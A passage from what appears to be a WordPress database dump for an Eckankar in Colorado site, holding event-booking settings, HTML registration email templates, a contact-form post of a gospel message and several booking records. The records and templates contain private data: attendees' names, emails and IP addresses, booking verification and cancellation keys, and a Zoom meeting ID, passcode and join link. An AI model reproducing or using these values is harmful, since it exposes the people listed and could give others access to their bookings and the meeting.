"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(173952,267579,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:32:\"Experience HU, The Sound of Soul\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"AM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}}}'),(173953,267579,'mec_fees_global_inheritance','1'),(173954,267579,'mec_fees','a:0:{}'),(173955,267579,'mec_ticket_variations_global_inheritance','1'),(173956,267579,'mec_ticket_variations','a:0:{}'),(173957,267579,'mec_reg_fields_global_inheritance','1'),(173958,267579,'mec_reg_fields','a:0:{}'),(173959,267579,'mec_bfixed_fields','a:0:{}'),(173960,267579,'mec_op','a:0:{}'),(173961,267579,'mec_fields','a:0:{}'),(173962,267579,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6143:\"<div>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</div>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone size-full wp-image-266555\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"602\" height=\"302\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #f28a27; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 18px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #f28a27;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b>891 2510 3432<br />\r\n<b>Passcode:</b> 162109</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:9894:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}'),(173963,267579,'mec_event_status','EventScheduled'),(173964,267579,'mec_moved_online_link',''),(173965,267579,'mec_cancelled_reason',''),(173966,267579,'mec_display_cancellation_reason_in_single_page',''),(173967,267579,'protect_children',''),(173968,267579,'passster_activate_global_protection',NULL),(173969,267579,'passster_activate_protection',NULL),(173970,267579,'passster_protection_type','password'),(173971,267579,'boldgrid_hide_page_title','0'),(173972,267579,'_thumbnail_id','266567'),(173973,267579,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(173974,267579,'boldgrid_in_page_containers','1'),(173976,267579,'_dp_original','266545'),(173977,267579,'_edit_lock','1671301986:15'),(173978,267579,'_edit_last','15'),(173979,267578,'smush-info','Failed with error code invalid_file_type - /home/eckank5/public_html/wp-content/uploads/2022/12/Dreams.webp - cannot be optimized, it has an invalid file type'),(173980,267578,'smush-complete',''),(173981,267580,'_field_133','Glen'),(173982,267580,'_field_134','Gorpe'),(173983,267580,'_field_135','g.gorpe@goretec.net'),(173984,267580,'_field_137','GOSPEL MESSAGE (Part I)'),(173985,267580,'_field_138','GOSPEL MESSAGE (Part I)\n\nWe do not become Christians by following some manual, religious ceremony or using some technique.  Our conversion is a result of God’s implanting His Spirit in our heart, giving us new power to live for him. The Holy Spirit gives new life to all who believes and accepts Jesus as their personal Lord and Savior.\n\n”But you will receive power when the Holy Spirit comes on you; and you will be my witnesses in Jerusalem, and in all Judea and Samaria, and to the ends of the earth.\" (Acts 1:8)\n\nThe Holy Spirit is given now, immediately when anyone believes in Jesus. There is no sign, no feeling, no emotional indication of it. It occurs, as Jesus said it would, when any believe on him. It is the means by which the risen life of Jesus becomes available to us, continuously and constantly. All that he is made available through all that I am.\n\nIt is a glorious kind of power. It does not need any props, does not require outside help, and does not borrow anything from the world. It does not even need a cup of coffee to get started in the morning! And it works best in a cemetery. It operates most visibly where everything is dull and lifeless, and nothing is happening. Anyone who is operating on resurrection power can come in and change the whole scene. \n\nResurrection power changes lives from within and not from without. It does not start on the outside, with the environment, or the circumstances, or the external situation; it starts within, and works out, to change the environment ultimately. And it does not separate or divide; it harmonizes, it heals, it draws together and breaks down \"middle walls of partition\" (Ephesians 2:14 KJV) that have been standing sometimes for centuries. It batters them down and brings people together, in harmony. It is a totally different kind of power. That is what you receive when you receive the Holy Spirit.\n\nAll of us have messed up our lives in one way or another; we have destroyed the wholeness already. But the glory of the good news is that in coming to Jesus, through his work on the cross on our behalf and his raising again from the dead, he can actually give us a new start. All the past is wiped out and forgiven. We are restored.\n \nSome of you may have been going to church for years. You have been hearing the gospel but you have never opened your hearts to God. But that is the final, necessary step. Ultimately, the will must be moved. Jesus said in Revelation, \"Behold I stand at the door (the door of the heart) and knock. If anyone hears my voice (feels desire), and will open the door (invite him to come in), I will come into him and live with him and he with me,\" Revelation 3:20). That is what happened in Thessalonica.\nThat is \"the work of faith.\" Until you have actually received Christ, you have not exercised faith. You can believe the story to be true, but until it moves you to receive the Lord you have not exercised faith. \n \nAll Have Sinned – Romans 3:23\n“For all have sinned and fallen short of the glory of God.”\n\nThe Wages of Sin is Death – Romans 6:23\n“For the wages of sin is death, but the free gift of God is eternal life in Christ Jesus, our Lord.”\n\nGod Loves You – Romans 5:8\n“God demonstrated His live toward us, in that while we were yet sinners, Christ died for us.”\n\nConfession and Salvation – Romans 10:9\n“That if you confess with your mouth Jesus as Lord, and believe in your heart that God raised Him from the dead, you shall be saved.”\n\nThus the religion of the world, with its emphasis upon the external, is ignored by God. Man fulfills his proper function only by receiving what God has done in Christ, without any need for observances or candles or form or ceremony, but by a quiet act of faith. That is the simplicity of belief in Jesus Christ. It is so uncomplicated, so simple, so available to all.\n\nIf you want to receive Christ into your life, visit this important message:\n\nhttp://www.harvest.org/knowgod/\n'),(173986,267580,'_form_id','13'),(173987,267580,'_seq_num','124'),(173988,267581,'_field_179','Paul'),(173989,267581,'_field_180','Hanson'),(173990,267581,'_field_181','azpaulfh@aol.com'),(173991,267581,'_field_182','NC'),(173992,267581,'_field_183','US'),(173993,267581,'_field_184','a:1:{i:0;s:41:\"Central Colorado - ECK Temple in Colorado\";}'),(173994,267581,'_form_id','17'),(173995,267581,'_seq_num','13'),(173996,267582,'mec_transaction_id','WZX17855'),(173997,267582,'mec_user_id','1000057'),(173998,267582,'mec_verified','1'),(173999,267582,'mec_verification_key','7df675c0b20284d129bd30615f5ea541'),(174000,267582,'mec_cancellation_key','4185ea7c9a2f96706493627b0ac7c359'),(174001,267582,'mec_confirmed','1'),(174002,267582,'mec_event_id','267539'),(174003,267582,'mec_date','1671359400:1671363000'),(174004,267582,'mec_ticket_id',',1,'),(174005,267582,'mec_booking_time','2022-12-17 16:12:18'),(174006,267582,'mec_all_dates','a:0:{}'),(174007,267582,'mec_other_dates','a:0:{}'),(174008,267582,'mec_attention_time','1671359400:1671363000'),(174009,267582,'mec_attention_time_start','1671359400'),(174010,267582,'mec_attention_time_end','1671363000'),(174011,267582,'mec_book_date_submit','20221217161218'),(174012,267582,'mec_booking_location','118'),(174013,267582,'mec_ticket_price_1','0'),(174014,267582,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:16:\"azpaulfh@aol.com\";s:4:\"name\";s:11:\"Paul Hanson\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"104.8.20.168\";}}'),(174015,267582,'mec_price','0'),(174016,267582,'mec_gateway','MEC_gateway_free'),(174017,267582,'mec_gateway_label','Free'),(174018,267583,'mec_transaction_id','JSG10325'),(174019,267583,'mec_user_id','1000058'),(174020,267583,'mec_verified','1'),(174021,267583,'mec_verification_key','803420f4f77a4a1deeba826cf12e9d6e'),(174022,267583,'mec_cancellation_key','a8206b868e2e657ffaa200d616847926'),(174023,267583,'mec_confirmed','1'),(174024,267583,'mec_event_id','266604'),(174025,267583,'mec_date','1671363900:1671368400'),(174026,267583,'mec_ticket_id',',1,'),(174027,267583,'mec_booking_time','2022-12-17 20:51:35'),(174028,267583,'mec_all_dates','a:0:{}'),(174029,267583,'mec_other_dates','a:0:{}'),(174030,267583,'mec_attention_time','1671363900:1671368400'),(174031,267583,'mec_attention_time_start','1671363900'),(174032,267583,'mec_attention_time_end','1671368400'),(174033,267583,'mec_book_date_submit','20221217205135'),(174034,267583,'mec_booking_location','118'),(174035,267583,'mec_ticket_price_1','0'),(174036,267583,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:16:\"einwrm@gmail.com\";s:4:\"name\";s:12:\"Elijah Beard\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"136.36.244.17\";}}'),(174037,267583,'mec_price','0'),(174038,267583,'mec_gateway','MEC_gateway_free'),(174039,267583,'mec_gateway_label','Free'),(174040,267584,'mec_transaction_id','KNF20107'),(174041,267584,'mec_user_id','1000059'),(174042,267584,'mec_verified','1'),(174043,267584,'mec_verification_key','99e5354a12dbb89b8e1f3f654a804115'),(174044,267584,'mec_cancellation_key','55fd50d73a065be26bdbf4a309ce0843'),(174045,267584,'mec_confirmed','1'),(174046,267584,'mec_event_id','267577'),(174047,267584,'mec_date','1673173800:1673177400'),(174048,267584,'mec_ticket_id',',1,'),(174049,267584,'mec_booking_time','2022-12-17 21:33:18'),(174050,267584,'mec_all_dates','a:0:{}'),(174051,267584,'mec_other_dates','a:0:{}'),(174052,267584,'mec_attention_time','1673173800:1673177400'),(174053,267584,'mec_attention_time_start','1673173800'),(174054,267584,'mec_attention_time_end','1673177400'),(174055,267584,'mec_book_date_submit','20221217213318'),(174056,267584,'mec_booking_location','129'),(174057,267584,'mec_ticket_price_1','0'),(174058,267584,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"nkemjikaugbaja@aol.com\";s:4:\"name\";s:12:\"Brown Ugbaja\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:14:\"41.217.101.201\";}}'),(174059,267584,'mec_price','0'),(174060,267584,'mec_gateway','MEC_gateway_free'),(174061,267584,'mec_gateway_label','Free'),(174062,267585,'mec_transaction_id','EFN27658'),(174063,267585,'mec_user_id','1000060'),(174064,267585,'mec_verified','1'),(174065,267585,'mec_verification_key','ee44a83a0696868f3ff0a27c49d61ca1'),(174066,267585,'mec_cancellation_key','74210911a1483e248cdc8354be1076dd'),(174067,267585,'mec_confirmed','1'),(174068,267585,'mec_event_id','267577'),(174069,267585,'mec_date','1673173800:1673177400'),(174070,267585,'mec_ticket_id',',1,'),(174071,267585,'mec_booking_time','2022-12-18 